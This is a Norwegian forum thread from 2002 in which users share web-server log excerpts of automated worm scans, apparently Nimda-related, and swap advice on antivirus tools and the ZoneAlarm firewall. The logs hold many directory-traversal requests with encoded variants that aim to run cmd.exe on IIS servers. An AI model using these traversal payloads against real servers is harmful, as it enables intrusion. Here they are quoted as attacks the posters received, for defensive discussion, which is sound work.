Hacking?? Kom med kommentar

[Xizor]

Et lite utdrag fra min IIS logg.

xxx.145.30.20 - WWW 10.0.0.2 80 GET /scripts/root.exe /c+dir 404 www -

 

xxx.145.30.20 - WWW 10.0.0.2 80 GET /MSADC/root.exe /c+dir 404 www -

 

xxx.145.30.20 - WWW 10.0.0.2 80 GET /c/winnt/system32/cmd.exe /c+dir 80 www -

 

xxx.145.30.20 - WWW 10.0.0.2 80 GET /d/winnt/system32/cmd.exe /c+dir 404

 

xxx.145.30.20 - WWW 10.0.0.2 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir

 

xxx.97.9.229 - 10.0.0.2 80 GET /scripts/..%5c..%5c../winnt/system32/cmd.exe /c+dir 404 -

 

 

 

[ Denne Melding var redigert av: Xizor på 2002-01-15 17:42 ]

[GXSilver]

Hei Xizor! har hatt lignende data i mine apache http logger. Noen eller noe prøver å hente filer fra ikke eksisterende kataloger (særlig winnt som jeg ikke har fordi jeg kjører XP). Jeg fant at ip'en hadde tilhørighet i frankrike, noe som sier at den i alle fall ikke hadde noe å gjøre på min server 1 time etter at jeg hadde startet opp Apache. Dette er mest sannsynlig ikke en person som sitter å prøver, men et program "zombie-bot" som prøver (sikkert) tilfeldige IP-er. Å kjøre server er forbundet med en viss risiko, så du må ta et valg.

Her er ett utdrag av min logg (ip-adressen en sensurert med X):

 

XXX.172.9.1 - - [13/Jan/2002:06:13:01 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

XXX.172.9.1 - - [13/Jan/2002:06:13:06 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

XXX.172.9.1 - - [13/Jan/2002:06:13:12 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

XXX.172.9.1 - - [13/Jan/2002:06:13:27 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331

XXX.172.9.1 - - [13/Jan/2002:06:13:32 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

XXX.172.9.1 - - [13/Jan/2002:06:13:37 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

XXX.172.9.1 - - [13/Jan/2002:06:13:46 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

XXX.172.9.1 - - [13/Jan/2002:06:14:15 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

XXX.172.9.1 - - [13/Jan/2002:06:14:20 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281

XXX.172.9.1 - - [13/Jan/2002:06:14:35 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281

XXX.172.9.1 - - [13/Jan/2002:06:14:40 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

XXX.172.9.1 - - [13/Jan/2002:06:14:44 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

 

Jeg har når stoppet min server. Lykke til!

 

Mvh

GXSilver

[GXSilver]

Og forresten: Ip adressen du viser til først i loggen din (213.145.30.20) kjører en zombie-bot som sprer et nimda virus. Jeg vet fordi jeg kjørte den i nettleseren min. Den lastet da automatisk ned en fil som prøvde å koble seg opp mot nettet 1-2 ganger hvert sekund (jeg kjører brannmur så jeg så det). Dette var en STOR tabbe. Unngå å gjøre samme skiten (sette ip'en i nettleseren altså).

IP adressen har tilhørighet i Italia.

 

Kjør virus scan med siste definisjoner på PC'en din PRONTO!!

 

GXSilver

[Xizor]

Såpass ja. Har du navnet på fila?

Kanskje man skulle ta kontakt med ISP`n til denne adressen. Det er faktisk mange adresser i Italia som har dette. Lokasjon Milano.

 

[ Denne Melding var redigert av: Xizor på 2002-01-15 17:43 ]

[Zamoht]

Ny på datasikkerhet... Hvor finner jeg slike logger?

Eksternt program eller integrert i windows?

[GXSilver]

Har kontaktet MIN ISP (abuse kontoret), men det er til liten nytte. Viruset blir sikkert fjernet, men det har spredd seg til X andre maskiner.

 

Når det gjelder filnavnet: MEP1262.temp.exe, som legger seg windows/temp. men dette er egentlig litt uvesentlig. Bruk heller antivirus-prog.

 

Brannmuren min (jeg bruker ZoneZlarm) viste ikke navnet på fila som prøvde å koble seg opp fra min PC, fordi det var ikke bare MEP fila som ville sende. Den hadde laget nye filer (med "kryptiske" tegn). Disse ble fjernet lett ned Norton.

Men ingen fare: nimda viruset gjør lite skade på egen pc.

 

GXSilver

[Xizor]

Bruker ZoneAlarm Pro her. Får legge disse adressene inn på restricted zone så man ikke tilfeldig går inn på dem igjen.

 

Zamoht

Dette er et eksempel på en loggfil som IIS lager.

IIS er webserveren/ftpserveren til Windows. Loggfilen inneholder info om alle som er inne på din website.

 

[ Denne Melding var redigert av: Xizor på 2002-01-15 18:04 ]

[GXSilver]

Hei Zamoth (..eller eheh: Thomas :smile:). Loggene vi snakker om er fra server programmer vi kjører på pc'en. Disse programmene må legges inn separat, de kommer ikke med windows (med unntak av win2000-server). Er du interessert i å beskytte deg (hvis du feks har fastlinje), kan du laste ned en GRATIS og MEGET bra brannmur fra http://www.zonelabs.com som heter ZoneAlarm. Jeg har lagt direkte linken til download siden her:

http://download.cnet.com/downloads/0-10105...10014..dl-57636

 

I dette programmet kan du se alle som prøver å koble seg opp mot din pc, og du kan bestemme hvilke programmer som skal få kommunisere ut mot nettet (feks nettleseren). Brannmuren i XP stopper ikke utgående trafikk, bare inngåede, dvs et virus kan lett spre seg fra din pc.

 

Hvis det er noe du lurer på ang ZoneAlarm er det bare å kontakte meg på [email protected]

 

Mvh

Thomas

GXSilver

[Zamoht]

Takk GXSilver for raskt svar!

 

Jeg sitter med WinXP på ISDN linje nå, men regner med at fastlionje er rundt hjørnet.. Telefonregninga begynner å bli høy her.. :smile:

 

Trodde det var en stor applikasjon jeg måtte laste ned jeg.. men overraskende nok var jo zoneAlarm på beskjedene 2,80 MB

Da er det bare å prøve seg frem :smile:

 

Mvh Thomas Nilsen aka Zamoht